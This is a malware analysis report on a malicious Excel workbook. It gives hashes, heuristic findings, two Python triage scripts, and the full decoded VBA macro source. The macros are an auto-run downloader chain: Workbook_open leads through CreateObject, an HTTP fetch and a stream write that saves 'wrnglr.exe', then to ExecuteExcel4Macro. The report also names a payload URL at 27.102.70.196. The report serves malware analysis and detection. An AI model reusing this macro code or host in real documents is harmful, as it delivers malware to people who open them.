Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 384e809707b59315…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 141.9 KB
Created: 2019-07-18 19:19:14
Authoring application: Microsoft Excel
First seen: 2020-05-25
MD5: 5f6c61cccf8cb547a3979e1d49a7ef81
SHA-1: 122d8e7bf648bcf5c0c61f5e8bbe92aab3b14a7b
SHA-256: 384e809707b593151d75d8c196b5b00019b060387da7f8c21a06c52c787e0cc9
Risk score: 210

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1203 Exploitation for Client Execution

This Excel workbook carries VBA macros that stage Excel 4.0 (XLM) macro execution. WorkBook_open uses CallByName to invoke Show on the UserForm Class5; loading the form fires UserForm_Initialize, which runs FUnt, instantiates ClaModu and calls PublicSub, which in turn calls CodeBlock.MethodENG. There CreateObject is invoked with ProgIDs read from form-control properties (Class7.TextBox1.Caption, Class7.Label2.Tag) instead of string literals. The first object is driven like an HTTP request (Open with a URL taken from Class7.Label3.Caption, Send, responseBody) and the second like a binary stream (Type = 1, Open, write, then savetofile to "wrnglr.exe"), a pattern consistent with MSXML2.XMLHTTP plus ADODB.Stream; the savetofile call sits inside #If FR_0, so it is compiled only if that constant is set in the project's conditional compilation arguments. Finally ExecuteExcel4Macro runs a formula held in Class7.T10_Text.Text. The download URL, the ProgIDs and the XLM formula therefore live in the form's control properties, not in the VBA source, and have to be recovered from the form streams (olevba also dumps form strings). Of the URLs carved from the document body, only http://27.102.70.196/k2 is a plausible second-stage source; the symcb/symcd/thawte entries are certificate revocation and policy endpoints. The cmd.exe-with-execution-flag string heuristic, which has no match in the decoded source, additionally points to external command execution driven from outside the VBA text.
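
To make that indirection concrete, the following Python script (an added example, not the sandbox's own code) walks the carved macros.bas from WorkBook_open and returns the procedure order and the sink calls reached, tagging the savetofile step with the #If constant that gates it. Its input is an excerpt of the decoded macro source shown below under Extracted artifacts; the walker is regex-based and resolves only the constructs this sample uses (bare and module-qualified calls, Dim ... As New aliases, CallByName "Show" on a UserForm), so it is a triage aid rather than a VBA interpreter.

```python
"""Walk the indirection in the summary above: Workbook_Open -> CallByName "Show" on a
UserForm -> UserForm_Initialize -> ... -> CreateObject / request / stream / ExecuteExcel4Macro.
Added example, not the sandbox's own code. MACRO_EXCERPT is an excerpt of the carved
macros.bas (declarations, the #If FR_9 block and the With wrapper dropped)."""
import re

MACRO_EXCERPT = r'''
Attribute VB_Name = "ThisWorkbook"
Sub WorkBook_open()
CallByName Class5, "Show", VbMethod
End Sub
Attribute VB_Name = "CodeBlock"
Public Sub MethodENG()
 Set Class7.Rocky1 = CreateObject(Class7.TextBox1.Caption)
Set Class7.Valaar1 = CreateObject(Class7.Label2.Tag)
End Sub
Attribute VB_Name = "ClaModu"
Public Sub PublicSub()
CodeBlock.MethodENG
Class7.Label5_Click
Class7.Rocky1.Send
    Class7.Valaar1.Open
    .write Class7.Rocky1.responseBody
#If FR_0 Then
    CallByName Class7.Valaar1, "savet" & "ofile", VbMethod, "wrnglr.e" & "" + "xe", 2
#End If
ExecuteExcel4Macro Class7.T10_Text.Text
End Sub
Attribute VB_Name = "Class7"
Public Sub Label5_Click()
Rocky1.Open Me.Label3.Caption, Me.T10_Text.Tag, False
End Sub
Attribute VB_Name = "Class5"
Sub FUnt()
Dim rd1 As New ClaModu
rd1.PublicSub
End Sub
Private Sub UserForm_Initialize()
FUnt
End Sub
'''

RE_MODULE = re.compile(r'Attribute VB_Name = "(\w+)"')
RE_SUB = re.compile(r"(?:Public |Private )?Sub (\w+)\(")
RE_NEW = re.compile(r"Dim (\w+) As New (\w+)", re.I)          # Dim rd1 As New ClaModu
RE_SHOW = re.compile(r'CallByName\s+(\w+),\s*"Show",\s*VbMethod', re.I)
RE_QUALIFIED = re.compile(r"^(\w+)\.(\w+)$")                  # Module.Proc or alias.Proc
RE_SINK = re.compile(r"CreateObject|ExecuteExcel4Macro|CallByName|\.(Open|Send|write)\b|savet", re.I)


def parse_modules(src):
    """{module: {proc.lower(): (proc, [body lines])}} from decoded VBA text."""
    modules, mod, proc = {}, None, None
    for raw in src.splitlines():
        line = raw.strip()
        if m := RE_MODULE.match(line):
            mod, proc = m.group(1), None
            modules[mod] = {}
        elif (m := RE_SUB.match(line)) and mod:
            proc = m.group(1).lower()
            modules[mod][proc] = (m.group(1), [])
        elif line.lower() == "end sub":
            proc = None
        elif proc:
            modules[mod][proc][1].append(line)
    return modules


def trace(src, entry=("ThisWorkbook", "workbook_open")):
    """Return (procedures in execution order, [(procedure, sink line, #If constant or None)])."""
    modules = parse_modules(src)
    order, sinks, aliases = [], [], {}

    def walk(mod, key):
        name, body = modules[mod][key]
        label = f"{mod}.{name}"
        if label in order:                         # recursion guard
            return
        order.append(label)
        gate = None                                # conditional-compilation constant in force
        for line in body:
            if line.startswith("#If"):
                gate = line.split()[1]
            elif line.startswith("#End If"):
                gate = None
            if RE_SINK.search(line):
                sinks.append((label, line, gate))
            if m := RE_NEW.match(line):
                aliases[m.group(1).lower()] = m.group(2)
            elif m := RE_SHOW.search(line):        # Show loads the form: Initialize fires first
                if "userform_initialize" in modules.get(m.group(1), {}):
                    walk(m.group(1), "userform_initialize")
            elif m := RE_QUALIFIED.match(line):
                target = aliases.get(m.group(1).lower(), m.group(1))
                if m.group(2).lower() in modules.get(target, {}):
                    walk(target, m.group(2).lower())
            elif re.fullmatch(r"\w+", line) and line.lower() in modules[mod]:
                walk(mod, line.lower())

    walk(*entry)
    return order, sinks


if __name__ == "__main__":
    procs, hits = trace(MACRO_EXCERPT)
    print(" -> ".join(procs), *(f"{p:28} {l}" + (f"  [only if {g} is defined]" if g else "") for p, l, g in hits), sep="\n")
```

The printed chain reproduces the summary: the only string literal on the whole path is "Show", every other parameter is fetched from a control property at run time, and the savetofile line is reported as compiled only when FR_0 is defined.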

Heuristics (7)

  • VBA macros detected [medium] OLE_VBA_MACROS (4 related findings)
    Document contains VBA macro code.
  • VBA ActiveX event launches decoded Excel4 macro [critical] OLE_VBA_ACTIVEX_XLM_STAGER
    The compiled VBA p-code (identifier table) references an auto-firing ActiveX/control event together with ExecuteExcel4Macro while the decompressed source does not, which is the VBA-stomping shape of the ActiveX-event XLM stager: the control event bridges into XLM formula execution to call Win32 APIs or drop payloads, hidden from source-level scanners. Check before relying on this for the present sample: the carved macros.bas below does contain ExecuteExcel4Macro (two call sites, in CodeBlock.MethodENG and ClaModu.PublicSub) and the control handler Class7.Label5_Click, so the p-code/source divergence should be confirmed against a p-code dump (for example with pcodedmp) before the module is reported as stomped.
  • CreateObject call [high] OLE_VBA_CREATEOBJ
    The ProgID is read from a form-control property rather than written as a literal. Matched line in script (with the line that follows it):
      Set Class7.Rocky1 = CreateObject(Class7.TextBox1.Caption)
      time = Format(Now + TimeSerial(0, 1, 1), "hh:mm")
  • CallByName call [high] OLE_VBA_CALLBYNAME
    Late-bound call of Show on the UserForm Class5, whose UserForm_Initialize handler starts the chain. Matched line in script (with the line before it):
      On Error Resume Next
      CallByName Class5, "Show", VbMethod
  • Workbook_Open macro [low] OLE_VBA_WBOPEN
    Runs automatically when the workbook is opened with macros enabled. Matched line in script (with surrounding lines):
      Attribute VB_Customizable = True
      Sub WorkBook_open()
      On Error Resume Next
  • Suspicious cmd.exe invocation with execution flag [high] SC_STR_CMD
    A cmd.exe string carrying an execution flag was found in the file. No matched line is reported and the string does not occur in the decoded macros.bas below, so it sits elsewhere in the document (form-control properties or the XLM formula passed to ExecuteExcel4Macro are the candidates this source points to).
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. Only the first entry below is a plausible payload source. The remaining hosts (symcb.com, symcd.com, thawte.com) are CRL, OCSP and certificate-policy endpoints of a Symantec/Thawte certificate chain, which is what an embedded code-signing certificate looks like when its DER is string-scanned; the stray characters appended to those URLs (0, 0&, 0W, 0/) are adjacent DER bytes and are reproduced here exactly as the extractor reported them.
      • http://27.102.70.196/k2 (in document text, OLE body)
      • http://t2.symcb.com0 (in document text, OLE body)
      • http://tl.symcd.com0& (in document text, OLE body)
      • http://t1.symcb.com/ThawtePCA.crl0 (in document text, OLE body)
      • http://tl.symcb.com/tl.crl0 (in document text, OLE body)
      • https://www.thawte.com/cps0/ (in document text, OLE body)
      • https://www.thawte.com/repository0W (in document text, OLE body)
      • http://tl.symcb.com/tl.crt0 (in document text, OLE body)
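
The OLE_VBA_ACTIVEX_XLM_STAGER entry above rests on the gap between compiled p-code and decompressed source: a source-level scanner sees only the latter, and that is what a VBA stomper overwrites while the p-code keeps running. The following Python, an added example rather than the analysis pipeline's code, implements the MS-OVBA CompressedContainer decompression that yields that source from a module stream (the same algorithm olevba applies when it decodes macros.bas). The containers it runs on are hand-built for the demonstration, not bytes from this workbook, and cover literal runs, an overlapping back-reference, a back-reference further than 16 bytes (where the offset/length split widens), a raw chunk, and a malformed copy token.

```python
"""MS-OVBA (section 2.4.1) decompression of a VBA module's compressed source container,
the only thing a source-level scanner sees and the part a VBA stomper overwrites.
Added example, not the analysis pipeline's own code; the containers at the bottom are
hand-built for the demo and are not bytes taken from the analysed workbook."""
import struct


def decompress_container(data: bytes) -> bytes:
    """Expand a CompressedContainer (0x01 signature followed by chunks) into source bytes."""
    if not data or data[0] != 0x01:
        raise ValueError("bad CompressedContainer signature")
    out, pos = bytearray(), 1
    while pos < len(data):
        header, = struct.unpack_from("<H", data, pos)
        if ((header >> 12) & 0x07) != 0b011:
            raise ValueError("bad CompressedChunkSignature")
        chunk_end = min(len(data), pos + (header & 0x0FFF) + 3)   # size field counts the header
        compressed = bool(header >> 15)
        pos += 2
        chunk_base = len(out)                 # where this chunk starts in the output
        if not compressed:                    # raw chunk: up to 4096 literal bytes
            out += data[pos:pos + 4096]
            pos += 4096
            continue
        while pos < chunk_end:
            flags = data[pos]
            pos += 1
            for bit in range(8):              # one flag bit per token, LSB first
                if pos >= chunk_end:
                    break
                if not (flags >> bit) & 1:    # 0 = literal byte
                    out.append(data[pos])
                    pos += 1
                    continue
                token, = struct.unpack_from("<H", data, pos)   # 1 = 16-bit copy token
                pos += 2
                produced = len(out) - chunk_base
                if produced == 0:
                    raise ValueError("copy token before any literal in the chunk")
                # the offset/length split widens as the chunk fills: ceil(log2(produced)), min 4
                bit_count = max((produced - 1).bit_length(), 4)
                length = (token & (0xFFFF >> bit_count)) + 3
                offset = (token >> (16 - bit_count)) + 1
                if offset > produced:
                    raise ValueError("copy offset points before the chunk")
                src = len(out) - offset
                for i in range(length):       # byte by byte, since source and target may overlap
                    out.append(out[src + i])
    return bytes(out)


def chunk(payload: bytes, compressed: bool = True) -> bytes:
    """Prefix chunk bytes with a header (demo helper; raw chunks are nominally 4098 bytes)."""
    size_field = len(payload) - 1 if compressed else 0x0FFF
    return ((0x8000 if compressed else 0) | 0x3000 | size_field).to_bytes(2, "little") + payload


# flags 0x02: token 0 literal "a", token 1 copy(offset 1, length 7) -> overlapping copy
SAMPLE_OVERLAP = b"\x01" + chunk(b"\x02a" + (0x0004).to_bytes(2, "little"))
# flags 0x08: three literals, then copy(offset 3, length 6); produced=3 -> 4 offset bits
SAMPLE_ABC = b"\x01" + chunk(b"\x08abc" + (0x2003).to_bytes(2, "little"))
# 17 literals, then copy(offset 17, length 9); produced=17 -> 5 offset bits: (16 << 11) | 6
SAMPLE_LONG = b"\x01" + chunk(b"\x00Attribut" + b"\x00e VB_Nam" + b"\x02e" + (0x8006).to_bytes(2, "little"))
# uncompressed chunk: literal bytes, no flag bytes
SAMPLE_RAW = b"\x01" + chunk(b"Attribute VB_Name", compressed=False)
# malformed: the very first token is a copy token, so there is nothing to copy from
SAMPLE_BAD = b"\x01" + chunk(b"\x01\x00\x00")

if __name__ == "__main__":
    for name in ("SAMPLE_OVERLAP", "SAMPLE_ABC", "SAMPLE_LONG", "SAMPLE_RAW"):
        print(name, decompress_container(globals()[name]))
```

Feed the decompressor a real module stream (everything from the module's TextOffset onward) and the result is text of the kind shown under Extracted artifacts; in a stomped module that text is junk or empty even though the module still executes, which is why the finding above cross-checks the p-code identifier table instead of trusting the source alone.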

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 3342 bytes
SHA-256: 0f8d5393f732295ecb858d596155660fa6602c129079ec7d970b367fb929c19b

Preview of the extracted script (first 1,000 lines; at 3342 bytes the file is shown in full):
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Sub WorkBook_open()
On Error Resume Next
CallByName Class5, "Show", VbMethod



End Sub





Attribute VB_Name = "CodeBlock"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Public Sub MethodENG()
Dim time

 
 Set Class7.Rocky1 = CreateObject(Class7.TextBox1.Caption)
time = Format(Now + TimeSerial(0, 1, 1), "hh:mm")

ExecuteExcel4Macro "MESSAGE(False, ""Release"")"



Set Class7.Valaar1 = CreateObject(Class7.Label2.Tag)

Dim fUP:  fUP = 0
#If FR_9 Then

Dim DirectionComponent_5
Dim DirectionComponent_6
Dim DirectionComponent_7
Dim DirectionComponent_9
Dim DirectionComponent_8: DirectionComponent_8 = 8
#End If
Dim DirectionComponent_12

Dim DirectionComponent_11: DirectionComponent_11 = ""
Dim fDOWN:  fDOWN = 0
fDOWN = 1
fDOWN = 2
fDOWN = 3
fDOWN = 4
End Sub




Attribute VB_Name = "ClaModu"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Public Sub PublicSub()

CodeBlock.MethodENG


Dim DirectionComponent_4
Dim DirectionComponent_3
Class7.Label5_Click
Class7.Rocky1.Send

With Class7.Valaar1
    .Type = 1
End With
    Class7.Valaar1.Open
With Class7.Valaar1
    .write Class7.Rocky1.responseBody

End With
#If FR_0 Then
    CallByName Class7.Valaar1, "savet" & "ofile", VbMethod, "wrnglr.e" & "" + "xe", 2

#End If

ExecuteExcel4Macro Class7.T10_Text.Text
ExecuteExcel4Macro "MESSAGE(False, ""Fix Marv"")"
End Sub


Attribute VB_Name = "Class7"
Attribute VB_Base = "0{BCDF87D8-10FE-4A45-9037-E1DA98118387}{A67BF4E4-00B4-417B-8495-74F7DD38C327}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Public Rocky2 As Object
 Public Valaar3 As Object
Public Rocky1 As Object
 Public Valaar2 As Object
Public Rocky3 As Object
 Public Valaar1 As Object


Public Sub Label5_Click()
Dim DirectionComponent_5
Rocky1.Open Me.Label3.Caption, Me.T10_Text.Tag, False
Dim DirectionComponent_6
End Sub

Public Sub S1000()

End Sub
Public Sub frfr4()

End Sub



Attribute VB_Name = "Class5"
Attribute VB_Base = "0{91950FA9-49B3-4930-930C-C2569C5DA979}{FF977004-D6B6-4519-B08E-2136C0F2ABC7}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Sub FUnt()
Dim rd1 As New ClaModu
rd1.PublicSub

End Sub

Private Sub UserForm_Initialize()

FUnt
Unload Me
End Sub